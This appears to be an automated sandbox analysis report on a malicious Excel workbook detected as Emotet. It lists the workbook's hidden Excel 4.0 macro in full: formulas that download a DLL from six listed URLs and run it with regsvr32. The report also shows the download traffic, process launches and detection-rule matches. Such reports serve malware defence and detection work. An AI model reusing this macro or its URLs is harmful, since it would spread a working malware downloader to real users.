                                SSDEEP:768:QmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:hBlntTEvDLmXi3JvG6YzATOJnXYSXRM
                                File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................
                                Icon Hash:e4e2aa8aa4bcbcac
                                Document Type:OpenXML
                                Number of OLE Files:1
                                Has Summary Info:
                                Application Name:
                                Encrypted Document:
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:
                                Name:PIMKE
                                Type:4
                                Final:False
                                Visible:False
                                Protected:False
                                                  PIMKE
                                                  4
                                                  False
                                                  0
                                                  False
                                                  pre
                                                  9,2,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0)",C14)=FORMULA("=IF(IVFB1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0))",C16)=FORMULA("=IF(IVFB2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0))",C18)=FORMULA("=IF(IVFB3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0))",C20)=FORMULA("=IF(IVFB4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0))",C22)=FORMULA("=IF(IVFB5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0))",C24)=FORMULA("=IF(IVFB6<0, CLOSE(0),)",C26)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll")",C28)=FORMULA("=RETURN()",C32)
                                               
                                Name:PIMKE
                                Type:4
                                Final:False
                                Visible:False
                                Protected:False
                                                  PIMKE
                                                  4
                                                  False
                                                  0
                                                  False
                                                  post
                                                  9,2,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0)",C14)=FORMULA("=IF(IVFB1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0))",C16)=FORMULA("=IF(IVFB2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0))",C18)=FORMULA("=IF(IVFB3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0))",C20)=FORMULA("=IF(IVFB4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0))",C22)=FORMULA("=IF(IVFB5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0))",C24)=FORMULA("=IF(IVFB6<0, CLOSE(0),)",C26)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll")",C28)=FORMULA("=RETURN()",C32)13,2,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0)15,2,=IF(IVFB1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0))17,2,=IF(IVFB2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0))19,2,=IF(IVFB3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0))21,2,=IF(IVFB4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0))23,2,=IF(IVFB5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0))25,2,=IF(IVFB6<0, CLOSE(0),)27,2,=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll")31,2,=RETURN()
                                               
                                TimestampSource PortDest PortSource IPDest IP
                                Mar 31, 2022 22:52:04.149321079 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.205347061 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.205596924 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.207230091 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.260242939 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721307993 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721391916 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721446991 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721465111 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.721497059 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.721499920 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721544981 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.721554041 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721601963 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.721616983 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721661091 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.721671104 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721716881 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.721724987 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721771955 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.721779108 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721827030 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.721832991 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.721880913 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.729486942 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.773739100 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.773817062 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.773860931 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.773870945 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.773884058 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.773926020 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.773977041 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.774621964 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.774677992 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.774729967 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.774740934 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.774781942 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.774831057 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.775355101 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.775417089 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.775422096 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.775468111 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.775518894 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.775527000 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.775569916 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.776072025 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.776125908 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.776156902 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.776175022 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.776180029 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.776231050 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.776279926 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.776474953 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.776530981 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.776541948 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.776580095 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.776582956 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.776633024 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.776637077 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.776748896 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.825921059 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.826000929 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.826011896 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.826046944 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.826069117 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.826119900 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.826121092 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.826169968 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.826731920 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.826787949 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.826798916 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.826848030 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.826889038 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.826905012 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.826941967 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.826950073 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.827894926 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.827951908 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.827965975 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.827994108 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.828039885 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.828056097 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.828121901 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.828262091 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.828609943 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.828666925 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.828674078 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.828711987 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.828723907 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.828778028 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.828784943 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.828860044 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.829221010 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.829274893 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.829328060 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.829328060 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.829334021 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.829382896 CEST8049165185.46.40.47192.168.2.22
                                Mar 31, 2022 22:52:04.829390049 CEST4916580192.168.2.22185.46.40.47
                                Mar 31, 2022 22:52:04.829487085 CEST4916580192.168.2.22185.46.40.47
                                TimestampSource PortDest PortSource IPDest IP
                                Mar 31, 2022 22:52:04.120479107 CEST5420653192.168.2.228.8.8.8
                                Mar 31, 2022 22:52:04.138972044 CEST53542068.8.8.8192.168.2.22
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Mar 31, 2022 22:52:04.120479107 CEST192.168.2.228.8.8.80x64ecStandard query (0)eles-tech.comA (IP address)IN (0x0001)
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Mar 31, 2022 22:52:04.138972044 CEST8.8.8.8192.168.2.220x64ecNo error (0)eles-tech.com185.46.40.47A (IP address)IN (0x0001)
                                • eles-tech.com
                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249165185.46.40.4780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                TimestampkBytes transferredDirectionData
                                Mar 31, 2022 22:52:04.207230091 CEST2OUTGET /css/KzMysMqFMs/ HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: eles-tech.com
                                Connection: Keep-Alive
                                Mar 31, 2022 22:52:04.721307993 CEST3INHTTP/1.1 200 OK
                                Date: Thu, 31 Mar 2022 20:52:02 GMT
                                Server: Apache
                                Cache-Control: no-cache, must-revalidate
                                Pragma: no-cache
                                Expires: Thu, 31 Mar 2022 20:52:02 GMT
                                Content-Disposition: attachment; filename="eVzUZ7dv5zBAXa5.dll"
                                Content-Transfer-Encoding: binary
                                Set-Cookie: 6246147296b82=1648759922; expires=Thu, 31-Mar-2022 20:53:02 GMT; Max-Age=60; path=/
                                Last-Modified: Thu, 31 Mar 2022 20:52:02 GMT
                                Content-Length: 868352
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/x-msdownload
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 19 fc 6d bc 5d 9d 03 ef 5d 9d 03 ef 5d 9d 03 ef 0b 82 10 ef 78 9d 03 ef 5d 9d 03 ef 65 9d 03 ef 3f 82 10 ef 4e 9d 03 ef 5d 9d 02 ef 88 9c 03 ef de 81 0d ef 46 9d 03 ef b5 82 09 ef d6 9d 03 ef e5 9b 05 ef 5c 9d 03 ef b5 82 08 ef df 9d 03 ef b5 82 07 ef 5c 9d 03 ef 52 69 63 68 5d 9d 03 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 a7 31 46 62 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 90 07 00 00 f0 05 00 00 00 00 00 10 a9 01 00 00 10 00 00 00 a0 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 0d 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 d5 08 00 ae 01 00 00 00 80 09 00 04 01 00 00 00 c0 09 00 33 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 5c 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8c 09 00 a0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 8e 07 00 00 10 00 00 00 90 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4e 37 01 00 00 a0 07 00 00 40 01 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 98 00 00 00 e0 08 00 00 50 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 e5 3c 00 00 00 80 09 00 00 40 00 00 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 33 34 03 00 00 c0 09 00 00 40 03 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 47 89 00 00 00 00 0d 00 00 90 00 00 00 b0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$m]]]x]e?N]F\\Rich]PEL1Fb!34\t.text~ `.rdataN7@@@.data(P@.idata<@0@.rsrc34@p@@.relocG@B


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.224916668.183.94.23980C:\Windows\SysWOW64\regsvr32.exe
                                TimestampkBytes transferredDirectionData


                                Click to jump to process

                                Target ID:0
                                Start time:22:51:42
                                Start date:31/03/2022
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                Imagebase:0x13f7e0000
                                File size:28253536 bytes
                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:3
                                Start time:22:51:51
                                Start date:31/03/2022
                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
                                Imagebase:0xdc0000
                                File size:14848 bytes
                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high

                                Target ID:4
                                Start time:22:51:52
                                Start date:31/03/2022
                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd"
                                Imagebase:0xdc0000
                                File size:14848 bytes
                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high

                                Target ID:5
                                Start time:22:51:55
                                Start date:31/03/2022
                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn"
                                Imagebase:0xdc0000
                                File size:14848 bytes
                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high

                                No disassembly